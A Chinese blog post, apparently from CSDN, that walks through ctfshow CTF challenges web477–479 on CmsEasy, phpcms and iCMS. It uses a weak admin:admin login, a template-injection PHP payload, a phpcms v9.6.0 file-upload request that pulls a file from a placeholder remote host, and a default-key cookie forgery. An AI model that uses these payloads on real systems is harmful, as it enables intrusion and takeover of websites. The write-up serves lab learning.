ctfshow CMS系列writeup(web477-web479)

最新推荐文章于 2024-08-04 01:03:52 发布
最新推荐文章于 2024-08-04 01:03:52 发布
阅读量5.2k 收藏 7
点赞数 4
分类专栏: CTF 文章标签: web安全 信息安全 安全漏洞
如需转载请于主页联系,得到允许方可实施
本文链接:https://blog.csdn.net/m0_60988110/article/details/122601605
版权

0x01 Web 477

打开页面发现是CmsEasy建站系统,题目提示RCE,百度寻找对应相关漏洞,多方查找后发现版本是v5.7,找到对应版本后进行搜索就变得很简单了。

找登录后台,/admin进入登录窗,然后小手一敲弱口令admin:admin进入后台,有点沙雕.......

忘记密码好像是存在洞的,重置完默认账号密码才会是admin:admin。因为这里默认admin就可以登录进去,漏洞存在与否不好验证,有兴趣的童鞋可以找找。

CmsEasy_v5.7 漏洞测试 - 云+社区 - 腾讯云

漏洞点在于模板-自定义标签部分,使用的payload: 1111111111";}<?php phpinfo()?>

 因为不知道它在哪里RCE,于是都填写payload进行攻击,打击预览,CRTL+F搜索ctfshow找到flag

payload构造这个东西涉及到代码审计,所以触及到我的知识盲区,唯一能感受到的是前面闭合,后面命令执行,如果有懂原理的朋友可以讲一讲。

 0x02 Web 478

按照题目提示安装cms系统

 CMS版本是phpcms v9.6.0,安装完成后访问页面如下图所示

题目提示为文件上传,搜索相关漏洞,FreeBuf找到文章

PHPCMS v9.6.0 任意文件上传漏洞分析 - FreeBuf网络安全行业门户

上传点问题处在注册部分,进行复现

 经我测试,按照抓包内容进行修改直接发包是不行的。

所以这里的poc就按照Freebuf上复制粘贴进行对应修改即可

siteid=1&modelid=11&username=test452&password=test2123&email=test2154@163.com&info[content]=<img src=http://xx.xx.xx.xx/1.txt?.php#.jpg>&dosubmit=1&protocol=

这里有两个注意点,第一个经测试不可以直接写php文件,发包后网页可以访问,但是会有问题,一句话不能执行,所以写txt;第二点,如果失败多记尝试几次,发包时记得修改邮箱、账号的值。

至于payload构造原理,涉及到代码审计,给出链接,可以自行参考学习。

PHP-code-audit/phpcmsv9.6.0 任意文件上传漏洞.md at master · jiangsir404/PHP-code-audit · GitHub

 flag在根目录,提交即可。

 0x03 Web 479

他喵的这道题可以说flag和sql注入没有毛关系.......

查找资料icms sql注入点是后台处 /admincp.php,但是搜索过后发现该cms不存在默认账号密码,尝试登录失败。于是查看hint,提示:默认key:n9pSQYvdWhtBz3UHZFVL7c6vf4x6fePk,key伪造。

因触及到知识盲区,询问大哥,一番讲解,恍然大悟,要挖洞洞在后台,后台进不去通过默认key伪造cookie登进后台,百度一番,在github上找到Y4tacker生成cookie脚本,链接如下:

https://github.com/Stakcery/Web-Security/blob/4aac5ffb955667b15ee3110fb99f6df1016c6760/%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9EAndCMS%E5%AE%A1%E8%AE%A1/CMS/iCMS/iCMS-7.0.1%E5%89%8D%E5%8F%B0%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/1.md

根据poc生成值

 登录伪造,进入后台,发现flag

0x04 总结

CMS系列仔细想了想,决定停手。原本认为找到CMS对应版本漏洞直接打就行,做了几题感觉效果是有但终究还是舍本逐末,还是得懂代码审计再进行操作对于技术来讲比较有意义。

身高两米不到
关注
专栏目录
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 639
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python脚
ctfshow-web477(CMS)
m0_62094846的博客
09-13 710
这个网站是用cmseasy搭建的,找一下cmseasy漏洞。网页是这样的,刚好和题目的网站对应上,版本是5.7。要进入管理界面,试一下在url后面输入admin。试用admin admin账号密码登录,成功。这里要在模块里面点编辑模块,这里没有。可能是版本不对 这里要7.3.8。1.试一下任意文件操作。再试一下代码执行漏洞。
ctfshow web入门 CMS web477--web479
2301_81040377的博客
07-29 317
不让扫,那就尝试一下admin路由,成功了admin登录进入后台也看到了其实首页可以看到提示然后去自定义标签打刷新一下预览即可也可以getshell能造成这些漏洞看了一下是因为之前此处填充的内容是反序列化存储的,但是我们如果使用就可以将其提前闭合从而达到命令执行的目的。
常见的CMS漏洞解析!
最新发布
muyuchen110的博客
08-04 1339
【代码】常见的CMS漏洞解析!
ctf.showCMS(web477-web478)
wanan的博客
08-31 1349
ctf.showCMS(web477-web478)
【CTF】ctfshow——web
m0_52923241的博客
09-19 2616
ctfshow之web通关web签到题(so easy)web2:SQL注入漏洞(联合查询)web3:文件包含漏洞web4:文件包含漏洞(日志注入)web5:md5绕过web6:SQL注入漏洞(空格被过滤)web7:SQL注入漏洞(盲注&sqlmap)布尔盲注sqlmapweb8:SQL注入漏洞(布尔盲注)web9:robots.txt + SQL注入 + md5web10web11:web12 web签到题(so easy) base64解码点这里 F12,看到有一串字符串,base64解码
CTF show WEB5
羽的博客
02-15 2814
考察md5绕过,要求v1为为字母,v2为数字,并且v1与v2的md5值相同。 md5漏洞介绍: PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0 所以只要v1与v2的md5值以0E开头即可。 v1=QNKCDZO&v2=240610708 这里附上常见的0E开头的MD5 0e开头的md5和原值: QNKCDZO 0e830400451993494058024219903...
CTF show WEB 1-4
羽的博客
02-15 7022
1.web签到题 直接源代码查看 2.web2 直接尝试万能密码,登陆成功 order by查找回显数 在3时正常回显,4是无回显,说明回显数为3 使用union select 联合查询爆库名 爆表名 爆字段 爆flag值 ...
CTFShow-Web入门
weixin_58546222的博客
12-15 864
CTFShow爆破解题思路
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
ctfshow-web入门-信息搜集wp
m0_53567065的博客
10-31 647
ctfshow-web入门-信息收集wp
CTFshow-Web入门writeup
m0_61596829的博客
06-08 612
CTFshow-Web入门writeup
ctfshow 萌新计划 writeup1-8
qq_44893894的博客
10-22 544
ctfshow 萌新计划 writeup web1 题目:代码很安全,没有漏洞。 页面代码如下 <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id是否存在 if(isset($_
i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现
AAAAAAAAAAAA66的博客
12-24 1581
今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题。。脑洞有点开。 再见CMS 昨天刚做一道 [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程_AAAAAAAAAAAA66的博客-CSDN博客 今天继续按着套路来 直接在线CMS指纹识别 百度找到payload ,都是些过了很久的漏洞了 这里简单知道是一个注入漏洞就行了,我们的目的是照着pa
[MTCTF]从出题人视角看ez_cms
Y4tacker的博客
05-23 1455
文章目录写在前面DockerhubWp 写在前面 太惨了,太傻了我,迷迷糊糊写了两天CMS,又累又自闭,还搞错了东西,给各位大师傅们道歉了,下面大师傅们要是瞧得上的化就那啥可以复现复现 Dockerhub docker pull y4tacker/ez_yxcms:1.0 随便写个docker-compose.yml version: "2" services: web: build: . image: yyds restart: always ports:
CMS漏洞复现
qq_44832048的博客
07-19 9857
dedeCMS (CNVD-2018-01221) 类型: php类cms系统:dedecms、帝国cms、php168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
常见的CMS漏洞
lhdbk______的博客
08-03 798
常见的CMS漏洞
Web安全 EmpireCMS漏洞常见漏洞分析及复现
2401_84297796的博客
04-28 1002
点击下一步就会自动在数据库生成一个empirecms的数据库并在其中建立许多个表然后再设置进入后台管理员的密码下一步即可安装完成,这里提示要删除路径避免被再次安装,但是这个地方其实设置了两层保护,即使你访问install这个路径会有一个.off文件在路径下,需要将这个.off文件删除后才能再次安装输入设置的后台管理员用户名和密码即可进入管理员后台。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值